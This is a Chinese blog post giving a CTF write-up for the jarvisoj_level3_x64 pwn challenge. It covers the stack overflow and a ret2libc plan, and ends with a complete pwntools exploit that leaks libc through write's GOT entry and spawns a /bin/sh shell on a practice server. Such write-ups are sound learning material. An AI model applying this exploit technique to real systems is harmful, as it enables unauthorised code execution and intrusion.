加载头像

jarvisoj_level3_x64

Ubuntu 16 来源:https://github.com/bash-c/pwn_repo

0x01

checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/jarvisoj_level3_x64/level3_x64'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled			//栈不可执行
    PIE:      No PIE (0x400000)

IDA

vulnerable_function()

1
2
3
4
5
6
7
ssize_t vulnerable_function()
{
  char buf[128]; // [rsp+0h] [rbp-80h] BYREF

  write(1, "Input:\n", 7uLL);
  return read(0, buf, 0x200uLL);
}

0x02

思路 ret2libc x64

1.栈溢出泄露write_got

2.利用LibcSearcher计算出system()和str_bin_sh

3.再次溢出执行system()

s 0x80
rbp 0x8
pop_rdi_ret 1
pop_rsi_r15_ret write_got,0
ret write()
write_ret main
s 0x80
rbp 0x8
pop_rdi_ret /bin/sh
ret system

0x03

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
from pwn import *
from LibcSearcher import *

context(log_level='debug', os='linux', arch='amd64')
io = remote('node4.buuoj.cn', 27818)
# io = remote('pwn2.jarvisoj.com', 9879)
# io = process(["./level3"])
elf = ELF("./level3_x64")

padding = 0x80 + 0x8
write_plt = elf.symbols['write']
write_got = elf.got['write']
main = elf.symbols['main']
delims = b'Input:\n'
pop_rdi_ret = 0x4006b3
pop_rsi_r15_ret = 0x4006b1  # : pop rsi ; pop r15 ; ret
#   gdb调试write时rdx足够大,不需要再控制了
payload = flat(b'a' * padding, pop_rdi_ret, 1, pop_rsi_r15_ret, write_got, 0, write_plt, main)
io.sendlineafter(delims, payload)

write_addr = u64(io.recv(6).ljust(8, b'\x00'))
print('[+] write_address -->', hex(write_addr))

# libc = LibcSearcher('write', write_addr)
# libc_base = write_addr - libc.dump('write')
# system = libc_base + libc.dump('system')
# bin_sh = libc_base + libc.dump('str_bin_sh')
# libc6_2.19-0ubuntu6.15_i386
libc = ELF('./libc-2.23.so')
libc_base = write_addr - libc.symbols['write']
system = libc_base + libc.symbols['system']
bin_sh = libc_base + libc.search(b'/bin/sh\x00').__next__()
print('[+] libc_base -->', hex(libc_base))
print('[+] system_address -->', hex(system))
print('[+] bin_sh -->', hex(bin_sh))

payload = flat(b'a' * padding, pop_rdi_ret, bin_sh, system)
io.sendlineafter(delims, payload)
io.interactive()

评论
匿名评论隐私政策
✅ 你无需删除空行,直接评论以获取最佳展示效果
avatar
这有关于运维、开发、后端相关的问题和看法。
相信你可以在这里找到对你有用的知识教程

Zelas2Xerath

技术苑
公告
2024/10/1-跟进上游更新
.NET1AMD1AWX1ChinaSkills2DIY1DirectX1GPU1IDA1KVM1Linux1Markdown1Office1Openwrt8Potplayer1Pwn1Python1RHCE1RHCSA1Redhat2Runtimes4Ryzen1Windows12ansible1cpu3eNSP1hexo2idm1iperf1pip1pwn1python1云计算2显示器1样题2职业技能大赛2虚拟化1装机3超频2配置单2金砖2
归档
网站资讯
文章总数 :
54
建站天数 :
全站字数 :
85.2k
总访客数 :
总访问量 :
最后更新 :
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體